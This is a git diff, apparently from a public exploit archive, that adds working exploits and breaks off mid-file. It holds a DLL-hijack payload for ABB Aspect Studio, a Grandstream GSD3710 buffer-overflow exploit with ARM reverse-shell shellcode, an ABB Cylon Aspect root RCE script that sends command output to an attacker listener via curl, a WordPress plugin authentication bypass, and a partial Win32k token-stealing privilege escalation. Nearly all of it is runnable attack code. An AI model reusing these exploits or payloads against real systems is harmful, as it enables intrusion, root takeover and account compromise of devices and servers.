+... +... +System.loadLibrary("CylonLicence"); +} catch (Throwable t) {} +LoggerUtil.logger.error("Error loading license DLL", t); +} +} +... +... + +C:\Aspect\Aspect-Studio-3.08.03> cd logs +C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log + +ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main] +java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path + at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867) + at java.lang.Runtime.loadLibrary0(Runtime.java:870) + at java.lang.System.loadLibrary(System.java:1122) + at com.aamatrix.util.AspectStudio.(AspectStudio.java:42) + at com.aamatrix.vib.rrobin.CylonLicense.(CylonLicense.java:18) + at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:38) + at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:34) + at com.aamatrix.projectmanager.AspectStudio.(AspectStudio.java:52) + at java.lang.Class.forName0(Native Method) + at java.lang.Class.forName(Class.java:348) + at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70) + ... + ... + +C:\DLL-Mala> type CylonLicence.cpp + +#define WIN32_LEAN_AND_MEAN +#include +#include + + +extern "C" __declspec(dllexport) +DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) { + ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL); + return 0; +} + +extern "C" __declspec(dllexport) +BOOL APIENTRY DllMain(HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved) { + switch (ul_reason_for_call) { + case DLL_PROCESS_ATTACH: + CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} \ No newline at end of file diff --git a/exploits/multiple/remote/52303.py b/exploits/multiple/remote/52303.py new file mode 100755 index 000000000..4ba4c6c12 --- /dev/null +++ b/exploits/multiple/remote/52303.py @@ -0,0 +1,247 @@ +#!/usr/bin/env python3 + +# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow +# Google Dork: [if applicable] +# Date: 2025-05-23 +# Exploit Author: Pepelux (user in ExploitDB) +# Vendor Homepage: https://www.grandstream.com/ +# Software Link: [download link if available] +# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower +# Tested on: Linux and MacOS +# CVE: CVE-2022-2070 + +""" +Author: Jose Luis Verdeguer (@pepeluxx) + +Required: Pwntools + +Example: + +Terminal 1: +$ ncat -lnvp 4444 + +Terminal 2: +$ python 3 CVE-2020-2070.py -ti DEVICE_IP -tp 8081 -ri LOCAL_IP -rp 4444 +""" + +from operator import ge +import sys +import time +from pwn import * + +import argparse + + +def get_args(): + parser = argparse.ArgumentParser( + formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( + prog, max_help_position=50)) + + # Add arguments + parser.add_argument('-ti', '--target_ip', type=str, required=True, + help='device IP address', dest="device_ip") + parser.add_argument('-tp', '--target_port', type=int, required=True, default=8081, + help='device port', dest="device_port") + parser.add_argument('-ri', '--reverse_ip', type=str, required=True, + help='reverse IP address', dest="reverse_ip") + parser.add_argument('-rp', '--reverse_port', type=int, required=True, + help='reverse port', dest="reverse_port") + + # Array for all arguments passed to script + args = parser.parse_args() + + try: + TI = args.device_ip + TP = args.device_port + RI = args.reverse_ip + RP = args.reverse_port + + return TI, TP, RI, RP + except ValueError: + exit() + + +def check_badchars(data): + for i in range(len(data)): + if data[i] in [0x0, 0x40]: + log.warn("Badchar %s detected at %#x" % (hex(data[i]), i)) + return True + return False + + +def get_shellcode(ip, port): + ip_bytes = socket.inet_aton(ip) + port_bytes = struct.pack(">H", port) + + # Linux ARM reverse shell + + # switch to thumb mode + sc = b"\x01\x30\x8F\xE2" # add r3, pc, #1 + sc += b"\x13\xFF\x2F\xE1" # bx r3 + + # socket(2, 1, 0) + sc += b"\x02\x20" # movs r0, #2 + sc += b"\x01\x21" # movs r1, #1 + sc += b"\x92\x1A" # subs r2, r2, r2 + sc += b"\xC8\x27" # movs r7, #0xc8 + sc += b"\x51\x37" # adds r7, #0x51 + sc += b"\x01\xDF" # svc #1 + sc += b"\x04\x1C" # adds r4, r0, #0 + + # connect(r0, &sockaddr, 16) + sc += b"\x0C\xA1" # adr r1, #0x30 + sc += b"\x4A\x70" # strb r2, [r1, #1] + sc += b"\x10\x22" # movs r2, #0x10 + sc += b"\x02\x37" # adds r7, #2 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 0) + sc += b"\x3F\x27" # movs r7, #0x3f + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x49\x1A" # subs r1, r1, r1 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 1) + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x01\x21" # movs r1, #1 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 2) + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x02\x21" # movs r1, #2 + sc += b"\x01\xDF" # svc #1 + + # execve("/bin/sh") + sc += b"\x06\xA0" # adr r0, #0x18 + sc += b"\x92\x1A" # subs r2, r2, r2 + sc += b"\x49\x1A" # subs r1, r1, r1 + sc += b"\x01\x91" # str r1, [sp, #4] + sc += b"\x02\x91" # str r1, [sp, #8] + sc += b"\x01\x90" # str r0, [sp, #4] + sc += b"\x01\xA9" # add r1, sp, #4 + sc += b"\xC2\x71" # strb r2, [r0, #7] + sc += b"\x0B\x27" # movs r7, #0xb + sc += b"\x01\xDF" # svc #1 + + sc += b"\x02\xFF" + sc += port_bytes + sc += ip_bytes + sc += b"/bin/shX" + + return sc + + +def main(): + ti, tp, ri, rp = get_args() + + # ROP Gadgets + + libc_base = 0x76ec1000 + + mprotect = libc_base + 0x93510+1 + pop_lr = libc_base + 0x1848C # pop {r0, r4, r8, ip, lr, pc} + pop_pc = libc_base + 0xd7515 # pop {pc} + pop_r0 = libc_base + 0x00064bb0+1 # 0x00064bb0 : pop {r0, pc} + + pop_r5 = libc_base + 0x00003738+1 # 0x00003738 : pop {r5, pc} + add_r1_sp = libc_base + 0x000b3c4e+1 # 0x000b3c4e : add r1, sp, #0x14 ; blx r5 + # 0x0002f83c (0x0002f83d): mov r0, r1; bx lr + mov_r0_r1 = libc_base + 0x0002f83d + # 0x0006a086 (0x0006a087): pop {r1, pc} + pop_r1 = libc_base + 0x6a087 + ands_r0_r1 = libc_base + 0x1feba+1 # 0x0001feba : ands r0, r1 ; bx lr + # 0x000a3a42 : movs r4, r0 ; pop {r1, pc} + mov_r4_r0 = libc_base + 0x000a3a42+1 + # 0x0001fdae (0x0001fdaf): movs r1, r0; bx lr + movs_r1_r0 = libc_base + 0x0001fdaf + + and_r0_f = libc_base + 0x8717e+1 # 0x0008717e : and r0, r0, #0xf ; bx lr + movs_r2_r0 = libc_base + 0x0001fc6a+1 # 0x0001fc6a : movs r2, r0 ; bx lr + mov_r0_r4 = libc_base + 0x0001f9d4+1 # 0x0001f9d4 : movs r0, r4 ; bx lr + blx_sp = libc_base + 0x46595 # 0x00046594 (0x00046595): blx sp + + shellcode = get_shellcode(ri, rp) + + auth_command = b"LOG/1.0 END CMD:AUTH_USERNAME @" + junk = p32(0x43434343) + + payload = auth_command + payload += b"A" * 144 + + # The goal is that R0 -> SP + + # R5 = pop {pc} + # because in the the next gadget we have a blx r5 + payload += p32(pop_r5) + payload += p32(pop_pc) # R5 = pop {pc} + + # R1 = SP ; BLX pop {pc} + payload += p32(add_r1_sp) # add r1, sp, #0x14 ; blx r5 + + # Restore LR register (because it has been updated by the last BLX gadget) + payload += p32(pop_lr) # pop {r0, r4, r8, ip, lr, pc} + payload += junk*4 # r0, r4, r8, ip + payload += p32(pop_pc) # LR = pop {pc} + + # R0 = stack address + payload += p32(mov_r0_r1) # mov r0, r1; bx lr + + # R1 = mask page align + payload += p32(pop_r1) # pop {r1, pc} + payload += p32(0xfffe1001) + + # R0 = stack address & 0xfffe1001 + payload += p32(ands_r0_r1) # ands r0, r1 ; bx lr + # R4 = R0 + payload += p32(mov_r4_r0) # movs r0, r4 ; bx lr + payload += junk # r1 + + # mprotect params + # r0 = shellcode page aligned address + # r1 = size(ofshellcode) + # r2 = protection (0x7 – RWX) + + # R2 = 0x7 + payload += p32(pop_r0) + payload += p32(0x07070707) + payload += p32(and_r0_f) # R0 = 7 (RWX) + payload += p32(movs_r2_r0) # R2 (prot: 7 - RWX) + + # R1 = length = 0x10101010 (avoid 0's) + payload += p32(pop_r0) + payload += p32(0x01010101) + payload += p32(movs_r1_r0) # r1 (length: 0x10101010) + + # R0 = stack address 4k aligned + payload += p32(mov_r0_r4) + + # mprotect(stack, 0x10101010, 0x7) + payload += p32(mprotect) + payload += p32(blx_sp) # ejecutamos en pila + payload += shellcode # shellcode + + if check_badchars(payload[len(auth_command):]): + sys.exit(0) + + log.info("Device IP: %s:%d" % (ti, tp)) + log.info("Attacker IP: %s:%d" % (ri, rp)) + log.info("Payload len: %d" % len(payload)) + + count = 1 + + while True: + try: + print('Try: %d' % count) + r = remote(ti, tp) + r.send(payload) + log.success("Payload sent!") + # r.close() + time.sleep(1) + count += 1 + except: + sleep(3) + pass + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52305.py b/exploits/multiple/remote/52305.py new file mode 100755 index 000000000..829ff225e --- /dev/null +++ b/exploits/multiple/remote/52305.py @@ -0,0 +1,281 @@ +#!/usr/bin/env python +# +# +# Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation +# +# +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio +# Firmware: <=3.08.03 +# +# Summary: ASPECT is an award-winning scalable building energy management +# and control solution designed to allow users seamless access to their +# building data through standard building protocols including smart devices. +# +# Desc: The ABB BMS/BAS controller is vulnerable to code execution and sudo +# misconfiguration flaws. An authenticated remote code execution vulnerability +# in the firmware update mechanism allows an attacker with valid credentials to +# escalate privileges and execute commands as root. The process involves uploading +# a crafted .bsx file through projectUpdateBSXFileProcess.php, which is then moved +# to htmlroot and executed by projectUpdateBSXExecute.php. This script leverages +# sudo to run the uploaded bsx file, enabling the attacker to bypass input validation +# checks and execute arbitrary code, leading to full system compromise and unauthorized +# root access. +# +# --------------------------------------------------------------------------------- +# +# $ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest +# [o] Exploit starting at 21.05.2025 12:33:47 +# [o] Using credentials: guest:***** +# [o] Auth successfull. +# [o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688 +# [o] Listening on 192.168.73.9:5555... +# [o] Building name: ["Tower 3"] +# [o] runtime.ver=v3.08.03 +# [+] -> [virtual] rootshell +# +# # id +# uid=0(root) gid=0(root) groups=0(root) +# # pwd +# /home/MIX_CMIX/htmlroot +# exit +# [o] Removing callback file. +# [!] Connection terminated. +# +# --------------------------------------------------------------------------------- +# +# +# Tested on: GNU/Linux 3.15.10 (armv7l) +# GNU/Linux 3.10.0 (x86_64) +# GNU/Linux 2.6.32 (x86_64) +# Intel(R) Atom(TM) Processor E3930 @ 1.30GHz +# Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz +# PHP/7.3.11 +# PHP/5.6.30 +# PHP/5.4.16 +# PHP/4.4.8 +# PHP/5.3.3 +# AspectFT Automation Application Server +# lighttpd/1.4.32 +# lighttpd/1.4.18 +# Apache/2.2.15 (CentOS) +# OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) +# OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2025-5947 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php +# +# +# 21.04.2024 +# +# + +from colorama import init, Fore +from urllib.parse import quote +from time import sleep +import threading +import datetime +import requests +import socket +import re +import os +import sys + +init() + +def safe(*trigger, ): + return True + +def auth(target_ip, user, pwd): + login_ep = f"http://{target_ip}/validate/login.php" + payload = { + 'f_user' : user, # 'aamuser, guest' + 'f_pass' : pwd, # 'default, guest' + 'submit' : 'Login' + } + sess = requests.Session() + r = sess.post(login_ep, data=payload) + if r.status_code == 200 and 'PHPSESSID' in sess.cookies: + print("[o] Auth successfull.") + phpsessid = sess.cookies.get('PHPSESSID') + print("[o] PHPSESSID:", phpsessid) + return sess.cookies + else: + print("[!] Auth failed.") + return None + +def kacuj(target_ip, listen_ip, cmd, token=None, cookies=None): + agentwho = "NetRanger/84.19" + payload = f"curl -A \"`{cmd}`\" {listen_ip}:5555" + url = f"http://{target_ip}/projectUpdateBSXFileProcess.php" + + headers = { + "Content-Type": "multipart/form-data; boundary=----zeroscience", + "User-Agent": agentwho + } + data = ( + "------zeroscience\r\n" + f"Content-Disposition: form-data; name=\"userfile\"; filename={AAM}\r\n" + "Content-Type: application/octet-stream\r\n\r\n" + f"{payload}\r\n" + '------zeroscience--\r\n' + ) + try: + r = requests.post(url, headers=headers, data=data, cookies=cookies) + if r.status_code == 200: + url_execute = f"http://{target_ip}/projectUpdateBSXExecute.php?file={AAM}" + r = requests.get(url_execute, cookies=cookies) + + return r.content + + except requests.exceptions.RequestException as e: + print(f"[!] Error sending payload: {e}") + + return None + +def koj_slusha(listen_ip): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + s.bind(("0.0.0.0", 5555)) + s.listen(1) + + print(f"[o] Listening on {listen_ip}:5555...") + + while True: + conn, addr = s.accept() + try: + data = conn.recv(9999) + if not data: + print("[!] Connection closed by remote host.") + break + dd = data.decode("utf-8", errors="ignore") + uam = re.search(r"User-Agent:\s*(.*)\s*Host:", dd, re.DOTALL) + if uam: + print(uam.group(1), end="") + else: + print + #print(f"[o] Full response:\n{dd}") + except Exception as e: + print(f"[!] Error while receiving data: {e}") + finally: + conn.close() + +def main(): + if safe(True): + print("\nSafety: \033[92mON\033[0m") + exit(-17) + else: + next + + global AAM + global start + AAM = "firmware.bsx" + + start = datetime.datetime.now() + start = start.strftime("%d.%m.%Y %H:%M:%S") + title = "\033[96mABB Cylon® ASPECT® Supervisory Building Control v3.08.03\033[0m" + subtl = "\033[95m\t\t-> Remote Root Exploit <-\033[0m" + prj = f""" + P R O J E C T\033[90m + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ +\033[0m + {title} + {subtl} + """ + if len(sys.argv) < 4: + print(prj) + print("./bsxroot.py ") + sys.exit(-0) + + target_ip = sys.argv[1] + listen_ip = sys.argv[2] + auth_arg = sys.argv[3] + + print("[o] Exploit starting at", start) + + if "--creds" in sys.argv: + creds_index = sys.argv.index("--creds") + 1 + if creds_index >= len(sys.argv): + print("[!] Error: Missing credentials after --creds.") + sys.exit(-1) + + user_pass = sys.argv[creds_index] + if ":" not in user_pass: + print("[!] Error: Invalid credentials format. Expected format: user:pass.") + sys.exit(-2) + + user, pwd = user_pass.split(":") + print(f"[o] Using credentials: {user}:{'*' * len(pwd)}") + cookies = auth(target_ip, user, pwd) + else: + token = auth_arg + cookies = {"PHPSESSID": token} + if not cookies: + sys.exit(-3) + + nishka = threading.Thread(target=koj_slusha, args=(listen_ip,)) + nishka.daemon = True + nishka.start() + + bacname = f"http://{target_ip}/getApplicationNamesJS.php" + r = requests.get(bacname) + if r.status_code == 200: + try: + r = r.content + decor = r.decode("utf-8") + except UnicodeDecodeError: + decor = r.decode("utf-8", errors="ignore") + + odg = re.search(r"var instanceDirectory=(.*?);", decor) + if odg: + cmd = "echo -ne \"[o] \" ; cat runtime/release.properties | grep -w 'runtime.ver'" + print("[o] Building name:", odg.group(1)) + kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) + print("\033[92m[+] -> [virtual] rootshell\033[0m\n") + else: + print("[o] Unknown building name.") + sleep(0.01) + + while True: + sleep(0.01) + cmd = input("# ") + if cmd.lower() in ["exit", "quit"]: + print("[o] Removing callback file.") + kacuj(target_ip, listen_ip, "rm /tmp/" + AAM, token=None, cookies=cookies) + print("\033[91m[!] Connection terminated.\033[0m") + os._exit(-17) + + kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) + + nishka.join() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52302.py b/exploits/multiple/webapps/52302.py new file mode 100755 index 000000000..20036eeb6 --- /dev/null +++ b/exploits/multiple/webapps/52302.py @@ -0,0 +1,65 @@ +#!/usr/bin/env python3 +# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass +# Date: 2025-05-22 +# Exploit Author: Mohammed Idrees Banyamer +# Vendor Homepage: https://wordpress.org/plugins/user-registration/ +# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip +# Version: <= 4.1.2 +# Tested on: WordPress 6.x, Apache on Linux +# CVE: CVE-2025-2594 + +import requests +import sys +import argparse +from urllib.parse import urljoin +from termcolor import cprint, colored + +def banner(): + cprint("┌──────────────────────────────────────────────┐", "cyan") + cprint("│ WordPress Plugin User Registration <= 4.1.2 │", "cyan") + cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan") + cprint("│ Author: Mohammed Idrees Banyamer │", "cyan") + cprint("└──────────────────────────────────────────────┘", "cyan") + +def exploit(target_url, member_id, nonce): + endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php") + + files = { + 'action': (None, 'user_registration_membership_confirm_payment'), + 'security': (None, nonce), + 'form_response': (None, '{"auto_login": true}'), + 'member_id': (None, str(member_id)) + } + + cprint(f"[+] Target URL: {endpoint}", "yellow") + cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow") + + try: + response = requests.post(endpoint, files=files, timeout=10) + + if response.status_code == 200 and '"success":true' in response.text: + cprint("[✓] Exploit successful! Authentication bypass achieved.", "green") + cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green") + print("Server Response:") + print(response.text) + else: + cprint("[-] Exploit failed or invalid nonce/member_id.", "red") + print("Server Response:") + print(response.text) + except requests.exceptions.RequestException as e: + cprint(f"[!] Request failed: {e}", "red") + +def main(): + banner() + + parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass") + parser.add_argument("target", help="Base target URL (e.g., http://localhost)") + parser.add_argument("member_id", help="Target user ID (usually 1 for admin)") + parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page") + + args = parser.parse_args() + + exploit(args.target, args.member_id, args.nonce) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/52301.c b/exploits/windows/local/52301.c new file mode 100644 index 000000000..95a2a6109 --- /dev/null +++ b/exploits/windows/local/52301.c @@ -0,0 +1,623 @@ +# Exploit Title: Microsoft Windows Server 2016 - Win32k Elevation of +Privilege +# Date: 2025-05-19 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# Country: United Kingdom +# CVE : CVE-2023-29336 + + + + +#include +#include +#include + +#define IDM_MYMENU 101 +#define IDM_EXIT 102 +#define IDM_DISABLE 0xf120 +#define IDM_ENABLE 104 +#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440 +#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448 +#define EPROCESS_TOKEN_OFFSET 0x4b8 + +typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT +uIDEnableItem, UINT uEnable); + +typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, +unsigned __int64 a3, unsigned int a4); +typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2); +typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, +int nConsoleInformationLength); + + +NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL; +NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL; +NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL; +fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr; +LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM +lParam); +int syytem(); +typedef struct _SHELLCODE { + DWORD reserved; + DWORD pid; + DWORD off_THREADINFO_ppi; + DWORD off_EPROCESS_ActiveLink; + DWORD off_EPROCESS_Token; + BOOL bExploited; + BYTE pfnWindProc[]; +} SHELLCODE, * PSHELLCODE; +struct tagMENU +{ + ULONG64 field_0; + ULONG64 field_8; + ULONG64 field_10; + ULONG64 field_18; + ULONG64 field_20; + PVOID obj28; + DWORD field_30; + DWORD flag1; + DWORD flag2; + DWORD cxMenu; + DWORD cyMenu; + ULONG64 field_48; + PVOID rgItems; + ULONG64 field_58; // + 0x58 + ULONG64 field_60; + ULONG64 field_68; + ULONG64 field_70; + ULONG64 field_78; + ULONG64 field_80; + ULONG64 field_88; + ULONG64 field_90; + PVOID ref; // + 0x98 +}; +struct MyData +{ + BYTE name[0x96]; +}; +tagMENU* g_pFakeMenu = 0; +static PSHELLCODE pvShellCode = NULL; +HMENU hSystemMenu; +HMENU hMenu; +HMENU hSubMenu; +HMENU hAddedSubMenu; +HMENU hMenuB; +PVOID MENU_add = 0; +DWORD flag = 0; +UINT iWindowCount = 0x100; +HWND HWND_list[0x300]; +HWND HWND_list1[0x20]; +HMENU HMENUL_list[0x300]; +int Hwnd_num = 0; +int Hwnd_num1 = 0; +ULONGLONG HWND_add = 0; +ULONGLONG GS_off = 0; +WORD max = 0; + +static PULONGLONG ptagWNDFake = NULL; +static PULONGLONG ptagWNDFake1 = NULL; +static PULONGLONG ptagWNDFake2 = NULL; + +static PULONGLONG GS_hanlde = NULL; + +static PULONGLONG HWND_class = NULL; + + +struct ThreadParams { + int threadId; + int numLoops; +}; + + +static unsigned long long GetGsValue(unsigned long long gsValue) +{ + return gsValue; +} +PVOID +GetMenuHandle(HMENU menu_D) +{ + int conut = 0; + PVOID HANDLE = 0; + PBYTE add = 0; + WORD temp = 0; + DWORD offset = 0xbd688; + HMODULE hModule = LoadLibraryA("USER32.DLL"); + + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + ULONGLONG par1 = 0; + DWORD par2 = 0; + memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); + memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); + + add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); + + if (add) + { + HANDLE = *(PVOID*)add; + } + else + { + HANDLE = 0; + } + HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20); + return *(PVOID*)HANDLE; + +} + +PVOID +xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde) +{ + int conut = 0; + PVOID HANDLE = 0; + PBYTE add = 0; + WORD temp = 0; + DWORD offset = 0xbd688; + HMODULE hModule = LoadLibraryA("USER32.DLL"); + + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + ULONGLONG par1 = 0; + DWORD par2 = 0; + memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); + memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); + + temp = (ULONGLONG)menu_D >> 16; + add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); + if (add) + { + HANDLE = *(PVOID*)add; + } + else + { + HANDLE = 0; + } + HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20); + return *(PVOID*)HANDLE; + +} + + +static +VOID +xxReallocPopupMenu(VOID) +{ + for (INT i = 0; i < 0x8; i++) + { + WNDCLASSEXW Class = { 0 }; + WCHAR szTemp[0x100] = { 0 }; + HWND hwnd = NULL; + wsprintfW(szTemp, +L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d", +i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + if (!RegisterClassExW(&Class)) + { + continue; + } + } + +} +VOID +createclass(VOID) +{ + WCHAR szTemp[0x100] = { 0 }; + for (INT i = 9; i < 29; i++) + { + WNDCLASSEXW Class = { 0 }; + + HWND hwnd = NULL; + wsprintfW(szTemp, L"A@A%d", i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0x20; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + Class.cbClsExtra = 0x1a0; + if (!RegisterClassExW(&Class)) + { + continue; + } + } + + for (INT i = 9; i < 29; i++) + { + wsprintfW(szTemp, L"A@A%d", i); + HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, +0, 0, NULL,NULL, NULL, NULL); + + + } + +} + +ULONG64 Read64(ULONG64 address) +{ + MENUBARINFO mbi = { 0 }; + mbi.cbSize = sizeof(MENUBARINFO); + + g_pFakeMenu->rgItems = PVOID(address - 0x48); + GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi); + + return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32); +} +void exploit() +{ + for (int i = 0; i < 0x20; i++) + { + + ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, +(LONG_PTR)g_pFakeMenu); + if (pmenu != 0) + { + Hwnd_num = i; + MENUBARINFO mbi = { 0 }; + mbi.cbSize = sizeof(MENUBARINFO); + + + + } + } + + + // Token stealing + ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO + p = Read64(p); //THREADINFO + p = Read64(p + 0x220); // (PROCESSINFO) + + ULONG64 eprocess = p; + printf("Current EPROCESS = %llx\n", eprocess); + p = Read64(p + 0x2f0); + + do { + + p = Read64(p + 0x08); + ULONG64 pid = Read64(p - 0x08); + if (pid == 4) { + + ULONG64 pSystemToken = Read64(p + 0x68); + printf("pSys/tem Token = %llx \n", pSystemToken); + + HWND_class = (PULONGLONG)((PBYTE)0x303000); + HWND_class[8] = eprocess + 0x290; + HWND_class[12] = 0x100; + HWND_class[20] = 0x303010; + + ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + +0x98 - 0xa0, (LONG_PTR)HWND_class); + SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken); + ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - +0xa0, (LONG_PTR)ret_add); + + break; + } + } while (p != eprocess); + syytem(); +} + + +void buildmem() +{ + + WORD max_handle = 0; + pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, +MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (pvShellCode == NULL) + { + return; + } + ZeroMemory(pvShellCode, 0x10000); + + + + ptagWNDFake = (PULONGLONG)((PBYTE)0x304140); + ptagWNDFake[0] = (ULONGLONG)0x304140; + + ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10; + + + + ptagWNDFake[6] = (ULONGLONG)0x304140; + ptagWNDFake[8] = 0x305300; + + ptagWNDFake[11] = (ULONGLONG)MENU_add; + ptagWNDFake[68] = 